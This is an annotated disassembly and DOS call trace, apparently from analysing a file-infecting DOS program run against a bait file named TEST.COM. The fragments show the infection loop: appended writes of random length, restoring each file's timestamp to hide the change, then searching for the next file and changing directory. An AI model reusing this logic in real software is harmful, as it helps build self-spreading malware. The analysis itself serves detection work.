0x12b15: mov ah, 0x40                ; AH = 40h, DOS write: BX = handle, CX = count, DS:DX = buffer
0x12b17: int 0x21                    ; clock-derived extra write after the 304-byte write at PC 12afd
0x12b19: mov cx, word ptr [0x220]    ; time word; presumably saved by the call logged at PC 12ad6 (confirm)
0x12b1d: mov dx, word ptr [0x21e]    ; date word, same assumption
0x12b21: mov ax, 0x5701              ; AX = 5701h, DOS set file date/time (CX = time, DX = date)
0x12b24: int 0x21                    ; stamp is set after the writes, so mtime is a weak indicator
0x12b26: mov ah, 0x3e                ; AH = 3Eh, DOS close handle
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f                ; AH = 4Fh, DOS find next matching file
0x12b2c: jmp 0x12a6f                 ; target outside this window; trace logs the search at PC 12a75
0x12b2f: mov dx, 0x21b               ; window is cut off here; consumer of DX is not shown
2018-12-17T22:57:07.651785849Z 44 PC: 12b0b | Get time 0x12b0b: mov cl, dl
; Disassembly window captured at the second "Get time" row; the row directly above
; holds its first instruction (0x12b0b: mov cl, dl, i.e. CL = hundredths of a second).
; The trace row after this window logs the resulting write: 49 bytes on handle 5.
; BX and DS are set outside this window and are not visible here.
0x12b0d: add cl, al                  ; adds AL as left by the time call; value not established here
0x12b0f: ror cl, 1
0x12b11: xor ch, ch                  ; CX = CL, so the byte count stays within 0..255
0x12b13: xor dx, dx                  ; buffer offset 0 in DS
0x12b15: mov ah, 0x40                ; AH = 40h, DOS write: BX = handle, CX = count, DS:DX = buffer
0x12b17: int 0x21                    ; variable-length write: per-file size growth is not constant
0x12b19: mov cx, word ptr [0x220]    ; time word; presumably saved by the call logged at PC 12ad6 (confirm)
0x12b1d: mov dx, word ptr [0x21e]    ; date word, same assumption
0x12b21: mov ax, 0x5701              ; AX = 5701h, DOS set file date/time (CX = time, DX = date)
0x12b24: int 0x21                    ; stamp is set after the writes; compare file contents, not mtime
0x12b26: mov ah, 0x3e                ; AH = 3Eh, DOS close handle
0x12b28: int 0x21
0x12b2a: mov ah, 0x4f                ; AH = 4Fh, DOS find next matching file
0x12b2c: jmp 0x12a6f                 ; target outside this window; trace logs the search at PC 12a75
0x12b2f: mov dx, 0x21b               ; DS:DX = path string at 0x21b; its contents are not on this page
0x12b32: mov ah, 0x3b                ; AH = 3Bh, DOS change current directory (trace op 59)
0x12b34: int 0x21
0x12b36: jb 0x12b3b                  ; carry set = directory change failed; target outside this window
0x12b38: jmp 0x12a6d                 ; otherwise jumps back near the search calls logged at PC 12a6c/12a75
2018-12-17T22:57:07.654303683Z 64 PC: 12b19 | Write file or device (Write 49 bytes on handle 5)
2018-12-17T22:57:07.657323941Z 87 PC: 12b26 | Get or set file date and time
2018-12-17T22:57:07.659694438Z 62 PC: 12b2a | Close file
2018-12-17T22:57:07.668708865Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.671798974Z 47 PC: 12a81 | Get disk transfer address
2018-12-17T22:57:07.673954286Z 67 PC: 12aa1 | Get or set file attributes
2018-12-17T22:57:07.684738701Z 61 PC: 12aa6 | Open file (Filename = 'TEST.COM')
2018-12-17T22:57:07.692129937Z 63 PC: 12abf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:57:07.699766945Z 62 PC: 12b2a | Close file
2018-12-17T22:57:07.701900275Z 79 PC: 12a75 | Find next file
2018-12-17T22:57:07.704511404Z 59 PC: 12b36 | Change current directory
2018-12-17T22:57:07.710324784Z 26 PC: 12b42 | Set disk transfer address